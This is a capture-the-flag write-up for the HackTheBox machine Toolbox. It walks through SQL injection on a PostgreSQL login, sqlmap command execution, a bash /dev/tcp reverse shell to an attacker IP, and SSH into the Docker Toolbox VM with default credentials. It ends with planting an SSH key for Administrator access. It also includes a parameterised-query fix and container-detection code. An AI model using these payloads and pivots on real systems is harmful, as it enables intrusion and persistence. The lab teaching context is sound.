HTB - Toolbox Writeup

Liam Geyer

👾 Machine Overview

This is a writeup of the machine Toolbox from HTB. It’s an easy difficulty Windows machine which featured SQL injection in a PostgreSQL-backed login form, command execution as the postgres user, and breaking out of a Docker container by way of the Docker Toolbox VM’s default credentials.

🔍 Enumeration

An initial nmap scan of the host gave the following results:

```text
nmap -sV -sC 10.129.96.171
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 21:28 EDT
Nmap scan report for 10.129.96.171
Host is up (0.020s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp 242520560 Feb 18  2020 docker-toolbox.exe
22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp open  ssl/http      Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -6h57m55s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-05-30T18:30:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.04 seconds
```

Nmap detected anonymous FTP access, so I immediately wanted to check that out; I didn’t see any anonymous SMB access. The mix of services is also worth a second look: FileZilla, OpenSSH for Windows and SMB say Windows host, but the HTTPS service on 443 reports Apache on Debian.

📂 FTP

I connected to FTP with the logon anonymous:anonymous.

Anonymous FTP

There’s just an exe for Docker Toolbox, which is a good indication of what the webserver is probably running on: an Apache/Debian banner on an otherwise Windows host fits a Linux container managed by Docker Toolbox. I don’t think there’s much to be done with the binary itself.

🌐 MegaLogistics

I checked out the site on port 443, and also added admin.megalogistic.com to my /etc/hosts file since it appeared as the TLS certificate’s commonName in the nmap scan.

MegaLogistics Homepage

The main site doesn’t have much of interest, I fuzzed for directories and checked out the contact form but nothing was too juicy.

Migrating over to admin.megalogistic.com, we’re presented with an admin sign in portal.

Admin Login

We don’t have any creds, and the forgot-password flow didn’t lead to anything.

I tried some generic admin:admin combinations and so on but wasn’t able to guess the login, so I tried some special characters to see if there’s any kind of injection we can attempt.

':' generated an error message, which suggests the input is concatenated straight into a query, so I ran sqlmap to try and get some payloads to bypass the login page.

SQLMap Output

The third payload it identified worked to bypass the login:

```text
username=SltW';SELECT PG_SLEEP(5)--&password=tWZd
```

The `;SELECT PG_SLEEP(5)--` part is a stacked query: it closes the original statement and runs a second one. That tells us two useful things before we go any further: the backend is PostgreSQL (PG_SLEEP is Postgres-specific), and the application executes multiple statements per request, which is what sqlmap’s OS takeover on PostgreSQL relies on later.
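
To make the mechanics of the login bypass concrete, here is an added example that is not part of the original writeup or the target application. It assumes the portal builds its query by string concatenation in the shape `... WHERE username = '<user>' AND password = '<pass>'` (an assumption; the real PHP was never seen) and uses an in-memory SQLite table as a stand-in for the PostgreSQL users table, with a constructed row. Because PG_SLEEP and stacked queries are Postgres features, the example generalises the bypass to the comment-based `admin'--` payload, which works on both engines, and contrasts the vulnerable function with a parameterised one that the same inputs cannot subvert.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the app's users table (not the real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'not-the-real-hash')")
    return conn


def vulnerable_login(conn, username, password):
    """String-concatenated query, the pattern the admin portal appears to use.

    A stray quote leaves an unterminated string literal and the database
    raises an error, which is exactly the leak that hinted at injection.
    """
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Parameterised query: user input is bound as data, never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def probe(conn, login):
    """Replay the three observations from the writeup against one login function:
    a lone quote errors, a comment-based bypass logs in without the password,
    and the legitimate credential still works.
    """
    results = {}
    try:
        results["quote"] = login(conn, "'", "x")
    except sqlite3.OperationalError as exc:
        results["quote"] = f"error: {exc}"
    # admin'-- closes the username literal and comments out the password check.
    results["bypass"] = login(conn, "admin'--", "wrong")
    results["legit"] = login(conn, "admin", "not-the-real-hash")
    return results


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_login), ("parameterised", safe_login)):
        print(name, probe(make_db(), fn))
```

The vulnerable function reports an error for the lone quote and a successful login for `admin'--`; the parameterised one returns False for both and True only for the real credential. The fix is the same on PostgreSQL: bind parameters (pg_query_params in PHP) rather than interpolating user input into the query string.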

We’re presented with a dashboard that’s not super useful, I think the notes are pretty much just red herrings.

Admin Dashboard

I decided to go back to sqlmap to see if we can get command execution or dump any interesting information as a result of the SQL injection.

First I captured a login request in burp and saved it to login.request for use with sqlmap.

Burp Logon Request

Next, I tried to dump public tables from the database.

```text
sqlmap -r login.request --force-ssl --batch --dbs --tables -D public
```

Listing Tables

This enumerated the users table, so next I tried dumping that.

```text
sqlmap -r login.request --force-ssl --batch --dbs --tables -D public -T users --dump
```

Dumping the users table

That did get me a hash for the admin user, but I wasn’t really sure what to do with it. I then tried to see if we could execute commands using sqlmap’s --os-cmd option with whoami as the command.

Testing Command Execution

Looks like it’s running as the postgres user. After some fiddling I was able to pop a reverse shell with bash -c "bash -i >& /dev/tcp/10.10.14.3/6969 0>&1" as my payload. The bash -c wrapper matters: /dev/tcp redirection is a bash feature, and commands run through the database land in /bin/sh, where the bare one-liner fails.

Shell as postgres

🥇 Root

First I stabilized the shell using python.

```text
python3 -c 'import pty;pty.spawn("bash")'
```

We know that we’re dealing with Docker Toolbox somewhere, and some research shows docker:tcuser as the default SSH credentials for the boot2docker VM that Docker Toolbox runs containers in.

The postgres box seemed really empty. ip a shows that our IP is 172.17.0.2, which is the default Docker bridge subnet, so we are inside a container and the .1 address is the machine running the Docker daemon. After getting stuck for a while I decided to check for other hosts and found .1.
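
Recognising the container and locating the Docker host is the step that cost the most time here, so below is an added example (my own code, not from the original writeup) that encodes the two checks a practitioner would run from the postgres shell: does this environment look like a Docker container, and which address on the bridge network belongs to the host. The container indicators it uses (the /.dockerenv file and container runtime names in /proc/1/cgroup) are the usual heuristics and are assumed to apply to this box; they are less reliable on cgroup v2 hosts, where /proc/1/cgroup may show only "0::/". The sample cgroup lines in the code are constructed for illustration.

```python
import ipaddress
import os

# Substrings that commonly appear in /proc/1/cgroup inside a container.
RUNTIME_MARKERS = ("docker", "containerd", "kubepods", "lxc")


def looks_like_container(cgroup_text, dockerenv_exists):
    """Heuristic container check.

    Docker drops /.dockerenv into the root of every container, and on
    cgroup v1 hosts the init process's cgroup path names the runtime.
    On cgroup v2 the path is often just "0::/", so a miss here is not proof
    of a bare host.
    """
    if dockerenv_exists:
        return True
    return any(marker in line
               for line in cgroup_text.splitlines()
               for marker in RUNTIME_MARKERS)


def bridge_host(ip_with_prefix):
    """Address the Docker daemon's host owns on the container's bridge.

    The daemon assigns itself the first usable address of each bridge
    network, which is 172.17.0.1 on the default docker0 bridge.
    """
    iface = ipaddress.ip_interface(ip_with_prefix)
    return str(iface.network[1])


def on_default_bridge(ip_with_prefix):
    """True if the address sits in Docker's default 172.17.0.0/16 bridge."""
    addr = ipaddress.ip_interface(ip_with_prefix).ip
    return addr in ipaddress.ip_network("172.17.0.0/16")


def check_this_host():
    """Run the heuristics against the machine this script executes on."""
    try:
        with open("/proc/1/cgroup") as fh:
            cgroup = fh.read()
    except OSError:
        cgroup = ""
    return looks_like_container(cgroup, os.path.exists("/.dockerenv"))


if __name__ == "__main__":
    # Constructed sample: what a cgroup v1 line looks like inside Docker.
    sample = "12:pids:/docker/0123456789abcdef\n1:name=systemd:/docker/0123456789abcdef\n"
    print("sample looks like container:", looks_like_container(sample, False))
    print("this host looks like container:", check_this_host())
    print("host to try next from 172.17.0.2/16:", bridge_host("172.17.0.2/16"))
```

With the container confirmed, the address returned by bridge_host is the one to probe for SSH with the Docker Toolbox default credentials; on this box that is 172.17.0.1.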

I attempted to login to that host with the default credentials for docker toolbox.

SSHing into Docker

We’re able to log in, and the docker user can run sudo su without a password! I started rooting around and found the /c directory, which is where Docker Toolbox mounts the Windows host’s filesystem into the VM.

Grabbing the Flag

After grabbing the flag, I added my SSH public key to the Administrator’s .ssh/authorized_keys through that mount so I could actually log in to the host machine over the OpenSSH service on port 22. One caveat for other Windows targets: a default Windows OpenSSH install checks members of the Administrators group against C:\ProgramData\ssh\administrators_authorized_keys instead of the per-user file, so if the key is ignored, that is the next place to look. Here the per-user file was honoured.

Shell as Administrator

  • Title: HTB - Toolbox Writeup
  • Author: Liam Geyer
  • Created at : 2024-07-26 00:00:00
  • Updated at : 2024-10-10 09:01:47
  • Link: https://lfgberg.org/2024/07/26/htb/toolbox/
  • License: This work is licensed under CC BY-NC-SA 4.0.